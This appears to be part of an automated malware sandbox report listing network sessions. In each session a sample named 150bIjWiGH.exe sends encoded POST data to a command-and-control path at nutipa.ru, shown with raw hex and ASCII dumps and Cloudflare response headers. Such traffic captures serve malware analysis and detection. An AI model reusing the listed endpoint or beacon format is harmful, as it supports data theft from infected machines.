                                                            Data Ascii: PUC[_\X^]ZVQP]WPUR^FZV[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(=1=946!(+]#Y(1>&.=V*U/'>]+5U,+.F'#P 3
                                                            Dec 15, 2024 19:37:32.007447004 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.248759031 CET951INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jSVv%2Flh17uR2%2FP1PTwYWCru%2BZ2xyOE9Kpnfuf%2B9XtdSx9jRTa6%2FjoovzB4CEP1qH0AIdy9GeCuACSj2vAVywydNWYz6jgFby%2FyzC%2FBGaKyHF7s84TS2vR7Asec%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba21c9a8c0b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4868&min_rtt=1972&rtt_var=6532&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=58063&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5c 22 3a 26 1d 20 00 2f 08 2c 2f 32 0b 29 30 3c 41 26 32 3e 03 27 2b 3b 58 29 5b 3c 0e 31 29 22 07 20 0c 31 57 3c 37 21 5d 31 26 21 51 03 11 21 00 26 10 2b 01 2b 39 3f 05 26 1f 34 03 25 3d 0a 59 2b 28 26 55 30 16 09 56 22 3e 09 0e 2d 14 23 05 28 04 3f 19 3a 2e 31 0c 20 1c 2e 53 0c 17 25 1e 3c 07 00 13 20 32 31 55 24 02 33 57 23 5f 3d 0c 3d 0a 3c 54 30 0a 38 0e 30 3e 12 1a 21 30 22 0e 32 14 0c 5a 37 0b 32 54 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989\":& /,/2)0<A&2>'+;X)[<1)" 1W<7!]1&!Q!&++9?&4%=Y+(&U0V">-#(?:.1 .S%< 21U$3W#_==<T080>!0"2Z72T>%\ .R4]T0
                                                            Dec 15, 2024 19:37:32.262188911 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:32.580823898 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.581069946 CET2536OUTData Raw: 50 53 46 58 5a 5c 5d 56 5d 5a 56 51 50 5f 57 57 55 50 5e 40 5a 50 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSFXZ\]V]ZVQP_WWUP^@ZP[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<.&Y>#Y"/&C+.$#%."'=9(33=&=#1W,.F'#P
                                                            Dec 15, 2024 19:37:33.059726954 CET799INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUNexAzmcziyI6ZwpyhamSi7exsY8We8tICVQopc%2FU2VhuFwyCdjxYMI4i7l73uDszh%2Bh64EnMMZ2AlqaeMnJqys2KjvOhoUVwZfb75sjPK%2FGrpio7dGqA0pBeI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba5affc8c0b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6162&min_rtt=1901&rtt_var=7530&sent=7&recv=11&lost=0&retrans=0&sent_bytes=1001&recv_bytes=4548&delivery_rate=1482986&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.449818104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:33.412204027 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:33.763674974 CET2536OUTData Raw: 55 55 43 5f 5a 5b 5d 51 5d 5a 56 51 50 5a 57 54 55 56 5e 46 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC_Z[]Q]ZVQPZWTUV^FZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^<=?:6/6<.3!?#&==&**0$=<#V8.F'#P /
                                                            Dec 15, 2024 19:37:34.493545055 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:34.835812092 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lMYqjzaNmwybRoP43%2FiAzQUa5GQdqbLN8DkjxTG2jIB0sYiDXnxwyU58l5d9RdrXI5RagdiALcEGrDAoPV5eXbbvjfjpdRxi6jwDMGktv4H2JcLYbRaJa%2BIndkU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bb1afc541cd-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4453&min_rtt=1788&rtt_var=6001&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=63167&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.449819104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:35.084913969 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:35.435619116 CET2536OUTData Raw: 50 56 43 50 5f 5d 5d 54 5d 5a 56 51 50 5d 57 51 55 5d 5e 49 5a 57 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVCP_]]T]ZVQP]WQU]^IZW[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<*'Y6&B(.+X4,+'.%'>%P>U;'>"<U*/+.F'#P 3
                                                            Dec 15, 2024 19:37:36.172308922 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:36.433260918 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21I1PNrLfOAH%2FrtsO8XHwS9G6AKW3ABQ5xdUiV%2BJbXP6w0fOUdVlIpa6hKauZlDvHRMjpBb%2BFoGRWRvIEWWvAC4eR9AERdgmDkLIi%2BfxkpH9NPcExZcfIw4bHmM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bbc1c9132f4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3834&min_rtt=2017&rtt_var=4391&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=88180&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.449820104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:36.682832003 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:37.029277086 CET2536OUTData Raw: 50 52 46 5c 5a 5a 58 51 5d 5a 56 51 50 5d 57 54 55 51 5e 44 5a 57 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRF\ZZXQ]ZVQP]WTUQ^DZW[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_).1)[5<=?=44$]&-&&>=W(0#$X&<&,.F'#P 3
                                                            Dec 15, 2024 19:37:37.808613062 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:38.044013977 CET798INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6CvO4x4OSf6o8%2BqTYA4XGzaRcd%2FhQd5lEmhWdux%2F5ts3mfaTrqpP31Uv1%2FHedPGPw73xhxviByLPpb46%2BiJoBcVGiJa34rbBGOOOY40dBiEXgAjKIFBnliFSyE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bc65fa59e02-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4316&min_rtt=1942&rtt_var=5477&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=69729&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.449821104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:37.386253119 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1404
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:37.732522011 CET1404OUTData Raw: 55 54 46 5d 5f 5a 58 5e 5d 5a 56 51 50 58 57 50 55 5d 5e 42 5a 51 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTF]_ZX^]ZVQPXWPU]^BZQ[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_?==\7[",*E?8#/%*^1X:=0 3=%<0)T/+.F'#P +
                                                            Dec 15, 2024 19:37:38.479573011 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:38.712125063 CET946INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EPrXDDCnCFPyu7utgctFSKwmu7j%2FiFfJsStsXwcYcnd01Ur1i6JlefzECtLpUODFpNy%2BkXnspFuK6yhntuLPK%2BJdR3YvlAFC8wz5be1sUw3OPj3LLU%2Fd7SvNPc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bca8e670ca0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2973&min_rtt=1668&rtt_var=3235&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1724&delivery_rate=120581&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 10 23 29 3a 1d 37 00 3f 09 2c 3f 3d 50 2b 0e 3f 1c 30 32 31 13 33 06 3b 5d 3e 13 2f 1c 26 39 08 06 34 32 2e 09 3f 27 0f 59 32 36 21 51 03 11 22 1d 26 2e 02 12 2a 2a 28 17 25 21 05 5a 25 2d 0e 5c 3f 38 08 1e 27 3b 3f 55 22 3d 37 0e 3a 3a 3b 03 2b 14 23 5c 3a 3e 32 1c 34 0c 2e 53 0c 17 25 5d 3c 29 2e 1c 21 32 35 56 30 3f 2b 1e 37 39 32 1e 3d 1d 23 0f 24 33 09 10 24 10 38 52 35 30 35 53 31 2a 21 02 34 21 22 1c 3d 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989#):7?,?=P+?0213;]>/&942.?'Y26!Q"&.**(%!Z%-\?8';?U"=7::;+#\:>24.S%]<).!25V0?+792=#$3$8R505S1*!4!"=%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.449822104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:38.288415909 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:38.638660908 CET2536OUTData Raw: 50 53 43 59 5f 56 58 56 5d 5a 56 51 50 5f 57 57 55 52 5e 45 5a 56 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSCY_VXV]ZVQP_WWUR^EZV[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z(>>Z>[5Z&E+-34;&>22(3['+3=;.F'#P
                                                            Dec 15, 2024 19:37:39.385776043 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:39.619956970 CET801INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYlod%2BUXDOPBkI9uj55RvGtkahbFPnml2VOvorjDYLx%2Fk2YGgr0m4Tcdxid7bnZ0qYZtn%2Fr5BpOYV6EbdI%2Fq%2FhOaQ5NUwGzO0XMOAUNLXQvU3IXDD5uThkRNvJY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bd03e6642af-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=15507&min_rtt=10021&rtt_var=14730&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=27082&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.449823104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:39.872565985 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:40.216818094 CET2536OUTData Raw: 55 53 43 5b 5a 58 5d 54 5d 5a 56 51 50 5d 57 56 55 56 5e 47 5a 57 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USC[ZX]T]ZVQP]WVUV^GZW[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?=.):(5:A+-7?\'>&=0.^+;.F'#P 3
                                                            Dec 15, 2024 19:37:40.959101915 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:41.211488008 CET800INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GGHq2oDnHRboVvJBRIHDPspPvV5aIyLZVO%2FL%2B0MKe0QBkllOdjhO%2BTJlDdZS3tACCuHOVwv9RfypqLxo8Jg%2BW6vvyfngB8%2ByxpZesrvmwv%2F6fY6mQ6BaVXwNWC4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bda0be64332-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1698&rtt_var=6875&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=54782&cwnd=112&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.449824104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:41.459038019 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:41.810499907 CET2532OUTData Raw: 55 54 43 5c 5a 58 58 56 5d 5a 56 51 50 58 57 57 55 50 5e 46 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC\ZXXV]ZVQPXWWUP^FZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\([>>97#?"E+87? Z%.9'>U)3Y0>"^<*;.F'#P 7
                                                            Dec 15, 2024 19:37:42.545125961 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:42.780071020 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10Ys5p1uYCzwrwObiw2psTqrB4tEtm9BMCigegGj2LIrAfwLY9g96Hp%2FhtpeJjbqg1VxNoqjrcahf3h5xQTYmo0Cxg2VcyxGGi%2BFy6XE6twYgLx1YxIwmtu1WrU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288be3fcdb5e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3845&min_rtt=1666&rtt_var=4983&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=76431&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.449825104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:43.021779060 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:43.373003960 CET2536OUTData Raw: 55 50 43 50 5a 5c 58 50 5d 5a 56 51 50 51 57 50 55 51 5e 42 5a 51 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPCPZ\XP]ZVQPQWPUQ^BZQ[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^?=-?)?5-).(#?2*2=-U*3;X'>!=3/.F'#P


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.449826104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:43.838815928 CET320OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
